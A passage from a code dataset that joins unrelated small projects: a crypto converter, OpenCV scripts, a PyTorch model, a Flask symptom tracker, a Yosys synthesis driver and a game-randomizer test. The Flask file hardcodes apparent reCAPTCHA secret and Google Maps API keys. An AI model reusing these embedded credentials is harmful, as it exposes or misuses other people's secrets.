"usage_type": "attribute"
},
{
"api_name": "product.modules.downloadable.models.DownloadLink",
"line_number": 29,
"usage_type": "name"
},
{
"api_name": "django.utils.translation.ugettext_lazy",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "django.template.RequestContext",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.render_to_response",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "django.core.urlresolvers.reverse",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "django.core.urlresolvers",
"line_number": 56,
"usage_type": "name"
},
{
"api_name": "django.template.RequestContext",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.render_to_response",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "django.core.urlresolvers.reverse",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "django.core.urlresolvers",
"line_number": 68,
"usage_type": "name"
},
{
"api_name": "django.http.HttpResponseRedirect",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "django.core.urlresolvers.reverse",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "django.core.urlresolvers",
"line_number": 72,
"usage_type": "name"
},
{
"api_name": "django.http.HttpResponseRedirect",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "satchmo_store.shop.signals.sendfile_url_for_file.send",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "satchmo_store.shop.signals.sendfile_url_for_file",
"line_number": 81,
"usage_type": "name"
},
{
"api_name": "os.path.basename",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 90,
"usage_type": "attribute"
},
{
"api_name": "django.http.HttpResponse",
"line_number": 95,
"usage_type": "call"
},
{
"api_name": "mimetypes.guess_type",
"line_number": 104,
"usage_type": "call"
}
] |
8101165169
|
import requests
import json
from config import keys
class ConvertionException(Exception):
pass
class CryptoConverter:
@staticmethod
def get_price(quote: str, base: str, amount: str):
if quote == base:
raise ConvertionException(f'Вы ввели одинаковые валюты {base}.')
try:
quote_ticker = keys[quote]
except KeyError:
raise ConvertionException(f'Не удалось обработать валюту {quote}')
try:
base_ticker = keys[base]
except KeyError:
raise ConvertionException(f'Не удалось обработать валюту {base}')
try:
amount = float(amount)
except ValueError:
raise ConvertionException(f'Не удалось обработать колличество {amount}.')
r = requests.get(f'https://min-api.cryptocompare.com/data/price?fsym={quote_ticker}&tsyms={base_ticker}')
total_base = json.loads(r.content)
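        # the cryptocompare /data/price response is expected to be {base_ticker: price},
        # i.e. the price of one unit of `quote` expressed in `base`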
new_price = total_base[keys[base]] * amount
new_price = round(new_price, 3)
message = f"Цена {amount} {keys[quote]} в {keys[base]} : {new_price}"
return message
|
voxvt/botexam
|
utils.py
|
utils.py
|
py
| 1,270 |
python
|
ru
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "config.keys",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "config.keys",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "requests.get",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "config.keys",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "config.keys",
"line_number": 34,
"usage_type": "name"
}
] |
21712175054
|
# -*- coding: utf-8 -*-
from django.core.management.base import BaseCommand, CommandError
from optparse import make_option
from ...scraper import Scrap
class Command(BaseCommand):
option_list = BaseCommand.option_list + (make_option(
'--url',
action='store',
dest='url',
help='Subject of the email'),)
def handle(self, *args, **options):
#try:
Scrap(options.get('url'))
#except:
# raise CommandError('Broken does not exist')
|
jms/FlyNi-API
|
flyni_api/flyni/management/commands/get_data.py
|
get_data.py
|
py
| 500 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "django.core.management.base.BaseCommand",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "django.core.management.base.BaseCommand.option_list",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "django.core.management.base.BaseCommand",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "optparse.make_option",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "scraper.Scrap",
"line_number": 18,
"usage_type": "call"
}
] |
37176092039
|
import numpy as np
import cv2
# Check available mouse events available with opencv library
# events = [i for i in dir(cv2) if 'EVENT' in i]
# print(events)
# General Callback function used for handling mouse events
def click_event(event, x, y, flags, param):
# Show x and y coordinate
if event == cv2.EVENT_LBUTTONDOWN:
print(x, ', ', y)
font = cv2.FONT_HERSHEY_SIMPLEX
strXY = str(x) + ', ' + str(y)
cv2.putText(img, strXY, (x, y), font, .5, (255, 255, 0), 2)
cv2.imshow('image', img)
# Show B, G and R channel
if event == cv2.EVENT_RBUTTONDOWN:
blue = img[y, x, 0]
green = img[y, x, 1]
red = img[y, x, 2]
font = cv2.FONT_HERSHEY_SIMPLEX
strBGR = str(blue) + ', ' + str(green) + ', ' + str(red)
cv2.putText(img, strBGR, (x, y), font, .5, (0, 255, 255), 2)
cv2.imshow('image', img)
# Create image from numpy
# img = np.zeros((512, 512, 3), np.uint8)
img = cv2.imread('data/images/messi.jpg')
img = cv2.resize(img, (512, 512))
# 'image' is windows title
cv2.imshow('image', img)
# setMouseCallback calls Function click_event
cv2.setMouseCallback('image', click_event)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
sbhrwl/object_detection
|
src/opencv/mouse_events/handle_mouse_event.py
|
handle_mouse_event.py
|
py
| 1,226 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "cv2.EVENT_LBUTTONDOWN",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "cv2.FONT_HERSHEY_SIMPLEX",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "cv2.putText",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "cv2.imshow",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "cv2.EVENT_RBUTTONDOWN",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "cv2.FONT_HERSHEY_SIMPLEX",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "cv2.putText",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "cv2.imshow",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "cv2.imread",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "cv2.resize",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "cv2.imshow",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "cv2.setMouseCallback",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "cv2.waitKey",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "cv2.destroyAllWindows",
"line_number": 41,
"usage_type": "call"
}
] |
70968292347
|
import cv2
import numpy as numpy
import os
detector = cv2.CascadeClassifier('haarcascade_frontalface_alt.xml')
recognizer = cv2.face.LBPHFaceRecognizer_create()
recognizer.read("trainer/trainer.yml")
font = cv2.FONT_HERSHEY_SIMPLEX
id = 0
name = ['none', 'Godswill', 'Ebere', 'Godswill', 'handle']
cap = cv2.VideoCapture(0)
while True:
ret, frame = cap.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = detector.detectMultiScale(gray, 1.1, 2)
for (x,y,w,h) in faces:
cv2.rectangle(frame, (x,y), (x+w, y+h), (255, 0, 0), 3)
        id, confidence = recognizer.predict(gray[y:y+h, x:x+w])
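        # LBPH 'confidence' is a distance: lower values mean a closer match, so values
        # up to 100 are accepted as a recognized face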
if (confidence <= 100):
id = name[id]
confidence = "{0}%".format(round(100-confidence))
else:
id = "Unknown"
confidence = "{}%".format(round(100-confidence))
cv2.putText(frame, str(id), (x+5, y-5), font, 1, (255, 0, 0), 2)
cv2.putText(frame, str(confidence), (x+5, y+h-5), font, 1, (255, 0, 0), 2)
cv2.imshow("Frame", frame)
k = cv2.waitKey(30) & 0xff
    if k == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
|
awesomegusS/cv
|
recognizer.py
|
recognizer.py
|
py
| 1,158 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "cv2.CascadeClassifier",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "cv2.face.LBPHFaceRecognizer_create",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "cv2.face",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "cv2.FONT_HERSHEY_SIMPLEX",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "cv2.VideoCapture",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2GRAY",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "cv2.rectangle",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "cv2.putText",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "cv2.putText",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "cv2.imshow",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "cv2.waitKey",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "cv2.destroyAllWindows",
"line_number": 45,
"usage_type": "call"
}
] |
74796405626
|
import torch
import torchvision
from torch import nn
from torch.nn import Sequential, Conv2d, MaxPool2d, Flatten, Linear
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
train_dataset = torchvision.datasets.CIFAR10(root="../dataset_CIFAR10", train=True, download=True,
transform=torchvision.transforms.ToTensor())
test_dataset = torchvision.datasets.CIFAR10(root="../dataset_CIFAR10", train=False, download=True,
transform=torchvision.transforms.ToTensor())
train_dataloader = DataLoader(dataset=train_dataset, batch_size=64, shuffle=True, drop_last=True)
class CIFAR10_Model(nn.Module):
def __init__(self):
super(CIFAR10_Model, self).__init__()
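        # three conv(5x5, padding=2) + max-pool stages reduce 3x32x32 inputs to 64x4x4
        # (1024 features), which the two Linear layers map to the 10 CIFAR-10 classes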
self.model = Sequential(Conv2d(3, 32, 5, stride=1, padding=2),
MaxPool2d(2),
Conv2d(32, 32, 5, stride=1, padding=2),
MaxPool2d(2),
Conv2d(32, 64, 5, stride=1, padding=2),
MaxPool2d(2),
Flatten(),
Linear(1024, 64),
Linear(64, 10))
def forward(self, x):
output = self.model(x)
return output
model1 = CIFAR10_Model()
print(model1)
input = torch.ones(64, 3, 32, 32)
print(input.shape)
output = model1(input)
print(output.shape)
writer = SummaryWriter("../logs/model")
writer.add_graph(model1, input)
writer.close()
|
ccbit1997/pytorch_learning
|
src/cifar10_model.py
|
cifar10_model.py
|
py
| 1,591 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "torchvision.datasets.CIFAR10",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "torchvision.datasets",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "torchvision.transforms.ToTensor",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "torchvision.datasets.CIFAR10",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "torchvision.datasets",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "torchvision.transforms.ToTensor",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "torch.utils.data.DataLoader",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "torch.nn.Module",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "torch.nn.Sequential",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "torch.nn.Conv2d",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "torch.nn.MaxPool2d",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "torch.nn.Conv2d",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "torch.nn.MaxPool2d",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "torch.nn.Conv2d",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "torch.nn.MaxPool2d",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "torch.nn.Flatten",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "torch.nn.Linear",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "torch.nn.Linear",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "torch.ones",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "torch.utils.tensorboard.SummaryWriter",
"line_number": 41,
"usage_type": "call"
}
] |
72226014269
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
import os
import datetime
from sqlalchemy.dialects.postgresql import ARRAY
app = Flask(__name__)
SECRET_KEY = os.urandom(32)
app.config['SECRET_KEY'] = SECRET_KEY
app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:///db.sqlite"
app.config['RECAPTCHA_USE_SSL'] = False
app.config['RECAPTCHA_PUBLIC_KEY'] = '6LfkN-EUAAAAAMEUxpQGg7DdGHqhz0eY0_2S5aKu'
app.config['RECAPTCHA_PRIVATE_KEY'] = '6LfkN-EUAAAAADXeLuqzoBOAg0F3f-b_oQEPiSzL'
app.config['RECAPTCHA_OPTIONS'] = {'theme': 'white'}
GOOGLEMAPS_KEY = "AIzaSyAsRuG0NnFmLNZlg6CWUTV8D2FA8gQo5xk"
app.config['GOOGLEMAPS_KEY'] = GOOGLEMAPS_KEY
db = SQLAlchemy(app)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
city = db.Column(db.String(100))
state = db.Column(db.String(100))
age = db.Column(db.Integer)
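    # symptoms are stored as a plain string; the imported Postgres ARRAY type is not
    # used here since the app is configured for SQLite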
symptoms = db.Column(db.String(), default=[])
ip_address = db.Column(db.String(255))
tested = db.Column(db.String(255))
in_contact = db.Column(db.String(255))
created_date = db.Column(db.DateTime, default=datetime.datetime.utcnow)
coordinates = db.Column(db.String(255))
def __init__(self, city, state, age, symptoms, ip_address, tested, in_contact, coordinates):
self.city = city
self.state = state
self.age = age
self.symptoms = symptoms
self.ip_address = ip_address
self.tested = tested
self.in_contact = in_contact
self.coordinates = coordinates
def __repr__(self):
        return "<Location %r>" % (self.coordinates)
# db.drop_all()
db.create_all()
|
dananguyenucsb/ithinkihavecovid-19
|
model.py
|
model.py
|
py
| 1,606 |
python
|
en
|
code
| 1 |
github-code
|
6
|
[
{
"api_name": "flask.Flask",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.urandom",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "flask_sqlalchemy.SQLAlchemy",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 34,
"usage_type": "attribute"
}
] |
27513964476
|
# -*- coding: utf-8 -*-
import os
import sys
import io
import math
def synthesize_asic_entity(yosys_location, yosys_synth_script, target_cell, entity_name, timing_constraint, synthesis_output_folder):
# Check if folder exists, and if not create
if(not os.path.isdir(synthesis_output_folder)):
os.mkdir(synthesis_output_folder)
# Check if folder exists for the synthesis script, if not, create it
int_synthesis_output_folder = synthesis_output_folder + '/' + yosys_synth_script[:-4]
if(not os.path.isdir(int_synthesis_output_folder)):
os.mkdir(int_synthesis_output_folder)
# Check if folder exists for the target cell, if not, create it
int_synthesis_output_folder = int_synthesis_output_folder + '/' + target_cell['name']
if(not os.path.isdir(int_synthesis_output_folder)):
os.mkdir(int_synthesis_output_folder)
command = 'SYNTH_TOP_UNIT_NAME=' + entity_name + ' '
command = command + 'SYNTH_ASIC_CELL_LOCATION=' + target_cell['liberty_file'] + ' '
command = command + 'SYNTH_ASIC_PIN_CONSTRAINTS=' + target_cell['pin_constr_file'] + ' '
command = command + 'SYNTH_TIMING_CONSTRAINT=' + timing_constraint + ' '
command = command + 'SYNTH_OUTPUT_CIRCUIT_FOLDER=' + int_synthesis_output_folder + ' '
log_filename = int_synthesis_output_folder + '/' + entity_name + '__t_' + timing_constraint + '.yslog'
command = command + yosys_location + ' -l ' + log_filename + ' -c ' + yosys_synth_script + ' -q'
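    # run yosys with the settings passed as environment variables (read by the TCL
    # synthesis script); the resulting log is parsed below for area and delay figures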
print(command)
os.system(command)
# Open log and look for the delay and area results
result_filename = int_synthesis_output_folder + '/' + entity_name + '__t_' + timing_constraint + '.result'
# Area string to look for
area_result_line_1 = 'Chip area for module ' + "'" + "\\" + entity_name + "':"
area_result_line_2 = 'Chip area for top module ' + "'" + "\\" + entity_name + "':"
possible_area_result_lines = []
# Delay string to look for
delay_result_line = 'Delay ='
possible_delay_result_lines = []
with open(log_filename, "r") as log_file:
for log_line in log_file:
if (delay_result_line in log_line):
possible_delay_result_lines += [log_line]
if (area_result_line_1 in log_line):
possible_area_result_lines += [log_line]
if (area_result_line_2 in log_line):
possible_area_result_lines += [log_line]
# Only write the biggest area found for the top architecture
if(len(possible_area_result_lines) <= 1):
biggest_area_line = 0
else:
biggest_area_line = 0
temp_line_splitted = possible_area_result_lines[0].split(":")
biggest_area_line_result = float((temp_line_splitted[1]).strip())
for i in range(1, len(possible_area_result_lines)):
temp_line_splitted = possible_area_result_lines[i].split(":")
temp_area_line_result = float((temp_line_splitted[1]).strip())
if(temp_area_line_result > biggest_area_line_result):
biggest_area_line = i
biggest_area_line_result = temp_area_line_result
# Only write the first delay found. This needs to be redone, because ABC doesn't give proper delay results for non flattened results.
with open(result_filename, "w") as result_file:
result_file.write(possible_area_result_lines[biggest_area_line])
result_file.write(possible_delay_result_lines[0])
def synthesize_simple_entity(yosys_location, yosys_synth_script, entity_name, synthesis_output_folder):
# Check if folder exists, and if not create
if(not os.path.isdir(synthesis_output_folder)):
os.mkdir(synthesis_output_folder)
# Check if folder exists for the synthesis script, if not, create it
int_synthesis_output_folder = synthesis_output_folder + '/' + yosys_synth_script[:-4]
if(not os.path.isdir(int_synthesis_output_folder)):
os.mkdir(int_synthesis_output_folder)
command = 'SYNTH_TOP_UNIT_NAME=' + entity_name + ' '
command = command + 'SYNTH_OUTPUT_CIRCUIT_FOLDER=' + int_synthesis_output_folder + ' '
log_filename = int_synthesis_output_folder + '/' + entity_name + '.yslog'
command = command + yosys_location + ' -l ' + log_filename + ' -c ' + yosys_synth_script + ' -q'
print(command)
os.system(command)
def synthesize_asic_list(yosys_location, all_yosys_synth_scripts, all_target_cells, all_entity_names, all_timing_constraints, synthesis_output_folder):
for each_yosys_synth_ecript in all_yosys_synth_scripts:
for each_std_cell in all_target_cells:
for each_entity in all_entity_names:
for each_timing_constraint in all_timing_constraints:
synthesize_asic_entity(yosys_location, each_yosys_synth_ecript, each_std_cell, each_entity, each_timing_constraint, synthesis_output_folder)
def synthesize_simple_list(yosys_location, all_yosys_synth_scripts, all_entity_names, synthesis_output_folder):
for each_yosys_synth_ecript in all_yosys_synth_scripts:
for each_entity in all_entity_names:
synthesize_simple_entity(yosys_location, each_yosys_synth_ecript, each_entity, synthesis_output_folder)
def generate_csv_with_all_results(all_yosys_asic_synth_script, all_target_cells, all_entity_names, all_timing_constraints, synthesis_output_folder):
area_result_line = 'Chip area'
delay_result_line = 'Delay ='
csv_file_name = synthesis_output_folder + '/' + 'results.csv'
for each_yosys_synth_ecript in all_yosys_asic_synth_script:
with io.open(csv_file_name, "w", encoding="ascii", newline='') as csv_file:
line = '"Entity Name","Technology","Timing Constraint","Area","GE","Delay"\r\n'
csv_file.write(unicode(line, encoding="ascii"))
for each_std_cell in all_target_cells:
nand_size = 0.0
with open(each_std_cell['nand_file'], "r") as nand_file:
nand_size = float(nand_file.readline())
for each_entity in all_entity_names:
for each_timing_constraint in all_timing_constraints:
line = '"' + each_entity + '"' + ',' + '"' + each_std_cell['name'] + '"' + ',' + '"' + each_timing_constraint + '"' + ','
result_filename = synthesis_output_folder + '/' + each_yosys_synth_ecript[:-4] + '/' + each_std_cell['name'] + '/' + each_entity + '__t_' + each_timing_constraint + '.result'
with open(result_filename, "r") as result_file:
for result_line in result_file:
if(area_result_line in result_line):
area_line_splitted = result_line.split(":")
area_result = (area_line_splitted[1]).strip()
line = line + '"' + area_result + '"' + ','
area_result_ge = str(int(math.ceil(float(area_result)/nand_size)))
line = line + '"' + area_result_ge + '"' + ','
with open(result_filename, "r") as result_file:
for result_line in result_file:
if(delay_result_line in result_line):
delay_line_splitted = result_line.split(delay_result_line)
delay_result = ((delay_line_splitted[1]).split())[0]
line = line + '"' + delay_result + '"'
line = line + '\r\n'
csv_file.write(unicode(line, encoding="ascii"))
# STD cells descriptions
asic_cells_base_folder = '/home/pedro/asic_cells/'
gscl45nm_library = {
'name' : 'gscl45nm',
'liberty_file' : asic_cells_base_folder + 'gscl45nm/gscl45nm.lib',
'pin_constr_file' : asic_cells_base_folder + 'gscl45nm/gscl45nm.constr',
'nand_file' : asic_cells_base_folder + 'gscl45nm/gscl45nm.nand',
}
nangate1_library = {
'name' : 'NangateOpenCellLibrary_typical_ccs',
'liberty_file' : asic_cells_base_folder + 'NangateOpenCellLibrary_typical_ccs/NangateOpenCellLibrary_typical_ccs.lib',
'pin_constr_file' : asic_cells_base_folder + 'NangateOpenCellLibrary_typical_ccs/NangateOpenCellLibrary_typical_ccs.constr',
'nand_file' : asic_cells_base_folder + 'NangateOpenCellLibrary_typical_ccs/NangateOpenCellLibrary_typical_ccs.nand',
}
# Adding cells to the list
all_std_cells_libraries = []
all_std_cells_libraries += [gscl45nm_library]
all_std_cells_libraries += [nangate1_library]
yosys_location = 'yosys'
all_yosys_asic_synth_script = ['synth_asic.tcl']
all_yosys_simple_synth_script = ['synth_simple.tcl']
# All timing constraints
all_timing_constraints = []
all_timing_constraints += ['10000']
# All entity names
all_entity_names = []
all_entity_names += ['subterranean_round']
all_entity_names += ['subterranean_rounds_simple_1']
all_entity_names += ['subterranean_rounds_simple_2']
all_entity_names += ['subterranean_rounds_simple_4']
# Synthesis output folder
synthesis_output_folder = 'synth_out'
if __name__ == "__main__" :
if(len(sys.argv) == 1):
print('This is a basic synthesizes script')
print('')
print('You can try to synthesize an entity not named here by just writing the name directly')
print('synth.py entity_name')
print('')
print('You can also synthesize one of the entities already listed here by writing -l and their number')
print('synth.py -l 0 1 2')
print('')
print('If you want everyone to be synthesized you can also just run -all')
print('synth.py -all')
print('')
print('If you want to generate asic csv report use -g')
print('synth.py -g')
print('')
print('Here are all timings in the script')
for i in range(len(all_timing_constraints)):
print(all_timing_constraints[i])
print('')
print('Here are all entities already in the script')
for i in range(len(all_entity_names)):
print(str(i) + ' - ' + all_entity_names[i])
else:
if(sys.argv[1] == '-all'):
synthesize_asic_list(yosys_location, all_yosys_asic_synth_script, all_std_cells_libraries, all_entity_names, all_timing_constraints, synthesis_output_folder)
synthesize_simple_list(yosys_location, all_yosys_simple_synth_script, all_entity_names, synthesis_output_folder)
elif(sys.argv[1] == '-l'):
selected_entity_names = []
list_of_numbers = [str(i) for i in sys.argv[2:]]
list_of_numbers = " ".join(list_of_numbers)
for i in range(len(all_entity_names)):
if(str(i) in list_of_numbers):
selected_entity_names += [all_entity_names[i]]
synthesize_asic_list(yosys_location, all_yosys_asic_synth_script, all_std_cells_libraries, selected_entity_names, all_timing_constraints, synthesis_output_folder)
synthesize_simple_list(yosys_location, all_yosys_simple_synth_script, selected_entity_names, synthesis_output_folder)
elif(sys.argv[1] == '-g'):
generate_csv_with_all_results(all_yosys_asic_synth_script, all_std_cells_libraries, all_entity_names, all_timing_constraints, synthesis_output_folder)
else:
            new_entity_name = [sys.argv[1]]
synthesize_asic_list(yosys_location, all_yosys_asic_synth_script, all_std_cells_libraries, new_entity_name, all_timing_constraints, synthesis_output_folder)
synthesize_simple_list(yosys_location, all_yosys_simple_synth_script, new_entity_name, synthesis_output_folder)
|
tintin10q/subterranean2digital
|
Reference_code/verilog_project/yosys_synth/synth.py
|
synth.py
|
py
| 11,689 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "os.path.isdir",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "os.mkdir",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path.isdir",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "os.mkdir",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.path.isdir",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "os.mkdir",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.system",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "os.path.isdir",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 67,
"usage_type": "attribute"
},
{
"api_name": "os.mkdir",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "os.path.isdir",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 71,
"usage_type": "attribute"
},
{
"api_name": "os.mkdir",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "os.system",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "io.open",
"line_number": 98,
"usage_type": "call"
},
{
"api_name": "math.ceil",
"line_number": 115,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 176,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 199,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 202,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 204,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 211,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 214,
"usage_type": "attribute"
}
] |
10423167833
|
from __future__ import annotations
import dataclasses
from random import Random
from unittest.mock import MagicMock
import pytest
from randovania.game_description.game_patches import GamePatches
from randovania.game_description.resources.pickup_index import PickupIndex
from randovania.game_description.resources.resource_type import ResourceType
from randovania.games.common.prime_family.layout.lib.prime_trilogy_teleporters import (
PrimeTrilogyTeleporterConfiguration,
)
from randovania.games.prime2.generator.bootstrap import EchoesBootstrap
from randovania.games.prime2.generator.pickup_pool import sky_temple_keys
from randovania.games.prime2.layout.echoes_configuration import LayoutSkyTempleKeyMode
from randovania.generator.pickup_pool import pool_creator
_GUARDIAN_INDICES = [
PickupIndex(43), # Dark Suit
PickupIndex(79), # Dark Visor
PickupIndex(115), # Annihilator Beam
]
_SUB_GUARDIAN_INDICES = [
PickupIndex(38), # Morph Ball Bomb
PickupIndex(37), # Space Jump Boots
PickupIndex(75), # Boost Ball
PickupIndex(86), # Grapple Beam
PickupIndex(102), # Spider Ball
PickupIndex(88), # Main Power Bombs
]
@pytest.mark.parametrize("vanilla_teleporters", [False, True])
def test_misc_resources_for_configuration(
echoes_resource_database,
default_echoes_configuration,
vanilla_teleporters: bool,
):
# Setup
teleporters = MagicMock(spec=PrimeTrilogyTeleporterConfiguration)
configuration = dataclasses.replace(default_echoes_configuration, teleporters=teleporters)
teleporters.is_vanilla = vanilla_teleporters
gfmc_resource = echoes_resource_database.get_by_type_and_index(ResourceType.MISC, "VanillaGFMCGate")
torvus_resource = echoes_resource_database.get_by_type_and_index(ResourceType.MISC, "VanillaTorvusTempleGate")
great_resource = echoes_resource_database.get_by_type_and_index(ResourceType.MISC, "VanillaGreatTempleEmeraldGate")
# Run
result = dict(
configuration.game.generator.bootstrap.misc_resources_for_configuration(
configuration,
echoes_resource_database,
)
)
relevant_tricks = {trick: result[trick] for trick in [gfmc_resource, torvus_resource, great_resource]}
# Assert
assert relevant_tricks == {
gfmc_resource: 0,
torvus_resource: 0,
great_resource: 0 if not vanilla_teleporters else 1,
}
@pytest.mark.parametrize("stk_mode", LayoutSkyTempleKeyMode)
def test_assign_pool_results(echoes_game_description, default_echoes_configuration, stk_mode: LayoutSkyTempleKeyMode):
patches = GamePatches.create_from_game(
echoes_game_description, 0, dataclasses.replace(default_echoes_configuration, sky_temple_keys=stk_mode)
)
pool_results = pool_creator.calculate_pool_results(patches.configuration, patches.game)
# Run
result = EchoesBootstrap().assign_pool_results(
Random(1000),
patches,
pool_results,
)
# Assert
shuffled_stks = [
pickup for pickup in pool_results.to_place if pickup.pickup_category == sky_temple_keys.SKY_TEMPLE_KEY_CATEGORY
]
assert result.starting_equipment == pool_results.starting
if stk_mode == LayoutSkyTempleKeyMode.ALL_BOSSES:
assert len(shuffled_stks) == 0
assert set(result.pickup_assignment.keys()) == set(_GUARDIAN_INDICES + _SUB_GUARDIAN_INDICES)
elif stk_mode == LayoutSkyTempleKeyMode.ALL_GUARDIANS:
assert len(shuffled_stks) == 0
assert set(result.pickup_assignment.keys()) == set(_GUARDIAN_INDICES)
else:
assert len(shuffled_stks) == stk_mode.num_keys
|
randovania/randovania
|
test/games/prime2/generator/test_echoes_bootstrap.py
|
test_echoes_bootstrap.py
|
py
| 3,634 |
python
|
en
|
code
| 165 |
github-code
|
6
|
[
{
"api_name": "randovania.game_description.resources.pickup_index.PickupIndex",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "randovania.game_description.resources.pickup_index.PickupIndex",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "randovania.game_description.resources.pickup_index.PickupIndex",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "randovania.game_description.resources.pickup_index.PickupIndex",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "randovania.game_description.resources.pickup_index.PickupIndex",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "randovania.game_description.resources.pickup_index.PickupIndex",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "randovania.game_description.resources.pickup_index.PickupIndex",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "randovania.game_description.resources.pickup_index.PickupIndex",
"line_number": 30,
